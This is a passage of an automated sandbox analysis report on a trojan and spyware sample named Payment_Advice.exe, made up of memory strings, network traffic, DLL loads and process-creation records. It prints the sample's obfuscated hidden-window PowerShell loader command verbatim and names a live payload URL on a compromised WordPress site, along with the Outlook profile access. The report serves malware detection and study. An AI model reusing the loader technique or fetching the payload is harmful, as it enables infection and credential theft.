            Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: wab.exe, 00000005.00000002.3299130843.000000002183E000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002182F000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002186F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: wab.exe, 00000005.00000002.3299130843.0000000021839000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: Payment_Advice.exe, Payment_Advice.exe.2.drString found in binary or memory: https://d.symcb.com/cps0%
            Source: Payment_Advice.exe, Payment_Advice.exe.2.drString found in binary or memory: https://d.symcb.com/rpa0
            Source: Payment_Advice.exe, Payment_Advice.exe.2.drString found in binary or memory: https://d.symcb.com/rpa0.
            Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: powershell.exe, 00000002.00000002.2431221389.00000000050D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2435366329.00000000075F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.2433528616.0000000005FEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000216D0000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: wab.exe, 00000005.00000002.3299130843.00000000216D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
            Source: wab.exe, 00000005.00000002.3299130843.0000000021769000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.00000000216FA000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3299130843.000000002173F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
            Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: wab.exe, 00000005.00000002.3305157603.00000000226A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: wab.exe, 00000005.00000002.3299130843.000000002186F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: wab.exe, 00000005.00000002.3299130843.000000002186A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: wab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.reap.skyestates.com.mt/
            Source: wab.exe, 00000005.00000002.3285487324.0000000005DA0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.bin
            Source: wab.exe, 00000005.00000002.3285513156.0000000005DF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.binN
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownHTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.5:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49730 version: TLS 1.2
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052D1

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: Payment_Advice.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas\Payment_Advice.exeJump to dropped file
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403358
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile created: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.SysJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_00404B0E0_2_00404B0E
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0040653D0_2_0040653D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04E5EAD82_2_04E5EAD8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04E5F3A82_2_04E5F3A8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04E5E7902_2_04E5E790
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0799C4D62_2_0799C4D6
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_028B53625_2_028B5362
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_028BA0885_2_028BA088
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_028BC1465_2_028BC146
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_028BC7385_2_028BC738
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_028BC4685_2_028BC468
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_028BD5995_2_028BD599
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_028BCA085_2_028BCA08
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_028BF8045_2_028BF804
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_028BCFAB5_2_028BCFAB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_028B6FC85_2_028B6FC8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_028BCCD85_2_028BCCD8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_028BEC185_2_028BEC18
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_028B39EE5_2_028B39EE
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_028B29EC5_2_028B29EC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_028B3E095_2_028B3E09
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_028BEC0B5_2_028BEC0B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_028BFC505_2_028BFC50
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_05BD26605_2_05BD2660
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_05BD55E05_2_05BD55E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_05BDBF405_2_05BDBF40
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_05BD39BC5_2_05BD39BC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_244929705_2_24492970
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_244922885_2_24492288
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_244952905_2_24495290
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_24491BA85_2_24491BA8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_244997B05_2_244997B0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_244900405_2_24490040
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_2449E0685_2_2449E068
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_2449E0675_2_2449E067
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_2449DC015_2_2449DC01
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_2449DC105_2_2449DC10
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_2449003F5_2_2449003F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_2449E4C05_2_2449E4C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_2449E4BF5_2_2449E4BF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_244929635_2_24492963
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_2449ED705_2_2449ED70
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_2449E9185_2_2449E918
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_2449E9175_2_2449E917
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_2449F1C85_2_2449F1C8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_24498DF95_2_24498DF9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_244995905_2_24499590
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_2449F1B95_2_2449F1B9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_24499E465_2_24499E46
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_2449FA785_2_2449FA78
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_244922785_2_24492278
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_24498E085_2_24498E08
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_2449F6205_2_2449F620
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_24499ED85_2_24499ED8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_244952835_2_24495283
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_2449D3605_2_2449D360
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_2449CF085_2_2449CF08
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_24490B285_2_24490B28
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_24490B305_2_24490B30
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_24491B975_2_24491B97
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 5_2_2449D7B85_2_2449D7B8
            Source: Payment_Advice.exeStatic PE information: invalid certificate
            Source: Payment_Advice.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/11@5/5
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045C8
            Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3660:120:WilError_03
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile created: C:\Users\user\AppData\Local\Temp\nspC30D.tmpJump to behavior
            Source: Payment_Advice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Payment_Advice.exeReversingLabs: Detection: 34%
            Source: C:\Users\user\Desktop\Payment_Advice.exeFile read: C:\Users\user\Desktop\Payment_Advice.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Payment_Advice.exe "C:\Users\user\Desktop\Payment_Advice.exe"
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) "
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Users\user\Desktop\Payment_Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) "Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Payment_Advice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2438381665.0000000008840000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdbu source: powershell.exe, 00000002.00000002.2438381665.0000000008840000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: aqm.Core.pdbh source: powershell.exe, 00000002.00000002.2435366329.00000000076DC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl] source: powershell.exe, 00000002.00000002.2435366329.0000000007645000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbB396-481F-9042-AD358843EC24c source: powershell.exe, 00000002.00000002.2438381665.0000000008840000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000002.00000002.2439089411.0000000009D91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
